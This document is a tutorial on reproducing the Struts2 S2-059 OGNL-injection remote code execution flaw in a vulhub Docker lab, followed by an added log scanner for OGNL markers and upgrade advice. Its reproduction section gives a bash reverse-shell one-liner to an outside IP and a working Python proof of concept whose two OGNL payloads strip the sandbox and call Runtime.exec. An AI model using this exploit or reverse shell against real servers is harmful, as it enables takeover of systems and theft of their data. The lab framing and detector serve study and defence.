


How to reproduce the Struts2 S2-059 remote code execution vulnerability
0x00 Introduction
Struts2 is a very powerful Java Web open source framework launched by the Apache software organization, which is essentially equivalent to a servlet. Struts2 is based on MVC architecture and has a clear framework structure. It is usually used as a controller to establish data interaction between models and views, and is used to create enterprise-level Java web applications. It utilizes and extends the Java Servlet API and encourages developers to adopt the MVC architecture. Struts2 takes the excellent design ideas of WebWork as the core, absorbs some advantages of the Struts framework, and provides a neater Web application framework implemented in the MVC design pattern.
0x01 Vulnerability Overview
When the attribute value of a Struts2 tag can be modified by external input, an attacker can construct a malicious OGNL expression and supply it there. The attribute value of the Struts2 tag triggers OGNL expression parsing, so the expression is executed, ultimately causing remote code execution.
0x02 Affected versions
Struts 2.0.0 – Struts 2.5.20
0x03 Environment setup
1. This vulnerability environment is quickly built using vulhub. The download address of vulhub is as follows:
https://github.com/vulhub/vulhub
cd vulhub-master/struts2/s2-059
2. Use docker-compose to quickly build the lab environment
docker-compose up -d
3. After the startup is completed, visit http://ip:8080/?id=1 in the browser and you can see the test interface
0x04 Vulnerability reproduction
1. Visit http://ip:8080/?id=%{88*88} in the browser. The response shows that 88*88 was parsed and evaluated, which means the OGNL expression is executed: the attribute value of the Struts2 tag triggers OGNL expression parsing.
2. Use the PoC to get a reverse shell. The reverse shell payload needs to be base64 encoded.
bash -i >& /dev/tcp/172.16.1.132/9967 0>&1
Base64 encoding website:
http://www.jackson-t.ca/runtime-exec-payloads.html
import requests

url = "http://127.0.0.1:8080"
# First request: clears the OGNL excluded classes and package names.
data1 = {
    "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"
}
# Second request: 'payload-base64编码' is a placeholder for the base64-encoded payload.
data2 = {
    "id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('payload-base64编码'))}"
}
res1 = requests.post(url, data=data1)
res2 = requests.post(url, data=data2)
3. Replace the payload in the PoC with your own payload, then run it with Python; you can see that the shell connects back
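On the defensive side, the requests used in this reproduction leave a recognizable trace in request logs. The following is an added example, not part of the original article: it URL-decodes log lines and flags the `%{...}` syntax together with the OGNL markers that appear in the PoC above. The log format, sample lines and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# OGNL markers taken from the two PoC requests shown on this page.
MARKERS = ("#context", "#attr", "#container", "setMemberAccess",
           "DEFAULT_MEMBER_ACCESS", "OgnlUtil", "setExcludedClasses",
           "setExcludedPackageNames", "@java.lang.Runtime@getRuntime")
# "%{...}" is the expression syntax the page uses in ?id=%{88*88}.
EXPR = re.compile(r"%\{(.*?)\}", re.DOTALL)

# Constructed request records (assumed format: client, request line, status, form body).
SAMPLE = [
    '10.0.0.5 "GET /?id=1 HTTP/1.1" 200',
    '10.0.0.9 "GET /?id=%25%7B88*88%7D HTTP/1.1" 200',
    '10.0.0.9 "POST / HTTP/1.1" 200 body="id=%25%7B%28%23context%3D%23attr%5B'
    '%27struts.valueStack%27%5D.context%29.%28%23context.setMemberAccess%28x%29%29%7D"',
    '10.0.0.7 "GET /?discount=20%25 HTTP/1.1" 200',
]


def decode(value, rounds=3):
    """URL-decode repeatedly so double-encoded input (%2525%257B) is caught too."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(value):
    """Return (verdict, markers) for one parameter value or log line."""
    match = EXPR.search(decode(value))
    if not match:
        return "clean", []
    hits = [m for m in MARKERS if m in match.group(1)]
    return ("ognl-exec-chain" if hits else "ognl-probe"), hits


def scan(lines):
    """Return (line_no, verdict, markers) for every suspicious line."""
    found = ((no, *classify(line)) for no, line in enumerate(lines, 1))
    return [f for f in found if f[1] != "clean"]


if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A line containing `%{` with no closing brace is not matched by this check, so treat it as triage alongside the upgrade, not as a filter.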
0x05 Repair Suggestions
1. Upgrade to Struts 2.5.22 or higher.
2. Enable OGNL expression injection protection measures: https://struts.apache.org/security/#proactively-protect-from-ognl-expression-injections-attacks-if-easily-applicable
